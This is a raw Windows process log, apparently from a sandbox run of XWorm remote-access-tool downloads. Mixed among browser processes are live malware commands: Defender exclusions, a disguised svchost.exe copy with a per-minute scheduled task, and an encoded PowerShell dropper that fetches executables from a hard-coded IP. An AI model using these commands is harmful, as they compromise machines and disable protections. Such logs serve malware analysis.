"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3200 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3960 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4956 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3252 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4700 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3964 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4912 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3716 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3724 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5396 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=4592 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5664 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5356 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4740 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6424 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6432 /prefetch:1
C:\Users\Admin\Downloads\XWorm-3.1-main\XWorm-3.1-main\XWorm V3.1.exe
"C:\Users\Admin\Downloads\XWorm-3.1-main\XWorm-3.1-main\XWorm V3.1.exe"
C:\Users\Admin\AppData\Roaming\XWorm V3.1.exe
"C:\Users\Admin\AppData\Roaming\XWorm V3.1.exe"
C:\Users\Admin\AppData\Roaming\svchost.exe
"C:\Users\Admin\AppData\Roaming\svchost.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\svchost.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\svchost.exe'
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\svchost.exe"
C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x00000000000004BC 0x00000000000004B8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=6792 /prefetch:2
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6016 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5956 /prefetch:1
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5832 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5296 /prefetch:1
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7164 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3496 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5508 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7076 /prefetch:8
C:\Users\Admin\Downloads\XWorm-Remote-Access-Tool-main\XWorm-Remote-Access-Tool-main\XWorm.exe
"C:\Users\Admin\Downloads\XWorm-Remote-Access-Tool-main\XWorm-Remote-Access-Tool-main\XWorm.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGUAcwBlACMAPgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAIgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAG4AYwBpACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcASQBuAGoAZQBjAHQAaQBvAG4AIABmAGEAaQBsAGUAZAAhACAAWQBvAHUAIABtAHUAcwB0ACAAcgB1AG4AIAB0AGgAaQBzACAAcwBvAGYAdAB3AGEAcgBlACAAYQBzACAAQQBkAG0AaQBuACEAJwAsACcAJwAsACcATwBLACcALAAnAFcAYQByAG4AaQBuAGcAJwApADwAIwBuAHEAegAjAD4AOwAiADsAPAAjAHkAagBpACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAdQB4AHYAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAaABxAHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAawBxAHAAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwAxADkANQAuADMALgAyADIAMwAuADIAMwA0AC8AeQBlAGwAbABvAHcALgBlAHgAZQAnACwAIAA8ACMAcABsAG0AIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAHAAaAAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBlAGEAYwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBNAHMAYwBvAG4AZgAuAGUAeABlACcAKQApADwAIwBqAHMAdQAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADUALgAzAC4AMgAyADMALgAyADMANAAvAGEAdgBkAGkAcwBhAGIAbABlAC4AYgBhAHQAJwAsACAAPAAjAG4AYwB5ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAeQB1AHUAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAZAB2AHgAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAcwBvAGYAdABwAHIAbwB0AGUAYwB0AC4AYgBhAHQAJwApACkAPAAjAGcAZwB6ACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwAxADkANQAuADMALgAyADIAMwAuADIAMwA0AC8ATQBQAFMAVgBDAC4AZQB4AGUAJwAsACAAPAAjAGIAegBzACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAbABzAGkAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAcgBlAHQAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbQBzAHYAYwBwAC4AZQB4AGUAJwApACkAPAAjAG4AYwBsACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwAxADkANQAuADMALgAyADIAMwAuADIAMwA0AC8AUABMAFYALgBlAHgAZQAnACwAIAA8ACMAZQBkAGsAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwB2AGIAeAAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBhAHEAdAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBQAEwALgBlAHgAZQAnACkAKQA8ACMAYgBkAHIAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAcQBpAHgAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHYAaQB1ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAE0AcwBjAG8AbgBmAC4AZQB4AGUAJwApADwAIwBhAGIAaAAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBuAGsAdwAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAZgBwAHQAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAcwBvAGYAdABwAHIAbwB0AGUAYwB0AC4AYgBhAHQAJwApADwAIwB4AGoAegAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBrAGIAaQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAcABxAHUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbQBzAHYAYwBwAC4AZQB4AGUAJwApADwAIwBuAGEAZQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBpAGwAZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAZgBtAGMAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAUABMAC4AZQB4AGUAJwApADwAIwBrAG0AcQAjAD4A"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-Type -AssemblyName System.Windows.Forms;<#nci#>[System.Windows.Forms.MessageBox]::Show('Injection failed! You must run this software as Admin!','','OK','Warning')<#nqz#>;
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\Downloads\XWorm-Remote-Access-Tool-main\XWorm-Remote-Access-Tool-main\XWorm.exe
"C:\Users\Admin\Downloads\XWorm-Remote-Access-Tool-main\XWorm-Remote-Access-Tool-main\XWorm.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGUAcwBlACMAPgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAIgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAG4AYwBpACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcASQBuAGoAZQBjAHQAaQBvAG4AIABmAGEAaQBsAGUAZAAhACAAWQBvAHUAIABtAHUAcwB0ACAAcgB1AG4AIAB0AGgAaQBzACAAcwBvAGYAdAB3AGEAcgBlACAAYQBzACAAQQBkAG0AaQBuACEAJwAsACcAJwAsACcATwBLACcALAAnAFcAYQByAG4AaQBuAGcAJwApADwAIwBuAHEAegAjAD4AOwAiADsAPAAjAHkAagBpACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAdQB4AHYAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAaABxAHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAawBxAHAAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwAxADkANQAuADMALgAyADIAMwAuADIAMwA0AC8AeQBlAGwAbABvAHcALgBlAHgAZQAnACwAIAA8ACMAcABsAG0AIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAHAAaAAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBlAGEAYwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBNAHMAYwBvAG4AZgAuAGUAeABlACcAKQApADwAIwBqAHMAdQAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADUALgAzAC4AMgAyADMALgAyADMANAAvAGEAdgBkAGkAcwBhAGIAbABlAC4AYgBhAHQAJwAsACAAPAAjAG4AYwB5ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAeQB1AHUAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAZAB2AHgAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAcwBvAGYAdABwAHIAbwB0AGUAYwB0AC4AYgBhAHQAJwApACkAPAAjAGcAZwB6ACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwAxADkANQAuADMALgAyADIAMwAuADIAMwA0AC8ATQBQAFMAVgBDAC4AZQB4AGUAJwAsACAAPAAjAGIAegBzACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAbABzAGkAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAcgBlAHQAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbQBzAHYAYwBwAC4AZQB4AGUAJwApACkAPAAjAG4AYwBsACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwAxADkANQAuADMALgAyADIAMwAuADIAMwA0AC8AUABMAFYALgBlAHgAZQAnACwAIAA8ACMAZQBkAGsAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwB2AGIAeAAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBhAHEAdAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBQAEwALgBlAHgAZQAnACkAKQA8ACMAYgBkAHIAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAcQBpAHgAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHYAaQB1ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAE0AcwBjAG8AbgBmAC4AZQB4AGUAJwApADwAIwBhAGIAaAAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBuAGsAdwAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAZgBwAHQAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAcwBvAGYAdABwAHIAbwB0AGUAYwB0AC4AYgBhAHQAJwApADwAIwB4AGoAegAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBrAGIAaQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAcABxAHUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbQBzAHYAYwBwAC4AZQB4AGUAJwApADwAIwBuAGEAZQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBpAGwAZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAZgBtAGMAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAUABMAC4AZQB4AGUAJwApADwAIwBrAG0AcQAjAD4A"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-Type -AssemblyName System.Windows.Forms;<#nci#>[System.Windows.Forms.MessageBox]::Show('Injection failed! You must run this software as Admin!','','OK','Warning')<#nqz#>;
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe" -ServerName:MiniSearchUI.AppXj3y73at8fy1htwztzxs68sxx1v7cksp7.mca
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7020 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6952 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3784 /prefetch:1
